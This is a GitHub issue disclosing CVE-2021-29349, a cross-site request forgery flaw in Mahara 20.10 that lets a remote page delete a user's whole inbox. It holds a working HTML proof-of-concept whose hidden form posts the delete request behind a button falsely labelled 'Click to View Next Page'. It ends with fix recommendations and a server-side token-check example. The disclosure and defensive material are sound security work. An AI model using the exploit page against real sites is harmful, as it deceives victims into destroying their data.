
CVE-2021-29349 #1

Open
0xBaz opened this issue Mar 31, 2021 · 0 comments

0xBaz (Owner) commented Mar 31, 2021

Product : Mahara 20.10

Description: Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a request to the /inbox.php directory, which leads to removing all messages from a mailbox.

Video POC : Google Drive Video

POC :

```html
/* Email Box Exploit - CSRF  */

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  margin: 0;
}

.bg {
  /* The image used */
  background-image: url("https://avatars.githubusercontent.com/u/78818477?s=400&u=b18f9de63b3df28e6e1b4d2dc64303048aa5f5b5&v=4");

  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}
</style>
</head>
<body>

<div class="bg"></div>

<p>CSRF CVE-2021-29349 , After clicking below button all inbox maill messages will be deleted  !!.</p>

</body>

<form enctype="multipart/form-data" method="POST" action="https://demo.mahara.org/module/multirecipientnotification/inbox.php"><table><input type hidden="text" value="Delete+all+notifications" name="submit">
<input type hidden="text" value="all" name="type">
<input type hidden="text" value="L8T0C4WDuMxzakwV" name="sesskey">
<input type hidden="text" value="" name="pieform_delete_all_notifications">
</table><input type="submit" value="Click to View Next Page"></form>
</html>
```

Recommendations :

1- Implement X-CSRF-TOKEN and make sure it is validated on the back-end server as well
2- Implement an interceptor which appends the token value to every (state-changing) request in the custom request header X-XSRF-TOKEN-B
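The server-side check the recommendations above ask for, as an added example that is not part of the report and not Mahara's own code. It models the vulnerable `inbox.php` handler with a constructed session object and constructed field names taken from the POC form (`sesskey`, `submit`, `type`); the delete only runs when the token bound to the caller's session matches, whether it arrives in the form field or in the `X-CSRF-TOKEN` header the report proposes.

```python
import hmac
import secrets


class Session:
    """Constructed stand-in for the server-side session (hypothetical, not Mahara's)."""

    def __init__(self):
        self.id = secrets.token_hex(16)
        # Per-session anti-CSRF token; the form and the header must echo this value.
        self.sesskey = secrets.token_urlsafe(24)
        # Constructed sample inbox contents.
        self.inbox = ["msg-1", "msg-2", "msg-3"]


def handle_inbox_post(session, form, headers):
    """Handle POST /inbox.php for the given session.

    Returns (http_status, message). The state-changing 'delete all' action
    is performed only after the CSRF token is validated against the session:
    a cross-site form cannot read the victim's sesskey, so a forged request
    either omits it or carries a stale/guessed value and is rejected.
    """
    supplied = headers.get("X-CSRF-TOKEN") or form.get("sesskey", "")
    # Constant-time comparison so the check does not leak token bytes via timing.
    if not supplied or not hmac.compare_digest(supplied, session.sesskey):
        return 403, "CSRF token missing or invalid; no messages deleted"

    if form.get("submit") == "Delete all notifications" and form.get("type") == "all":
        deleted = len(session.inbox)
        session.inbox.clear()
        return 200, f"deleted {deleted} messages"
    return 400, "unrecognised action"
```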
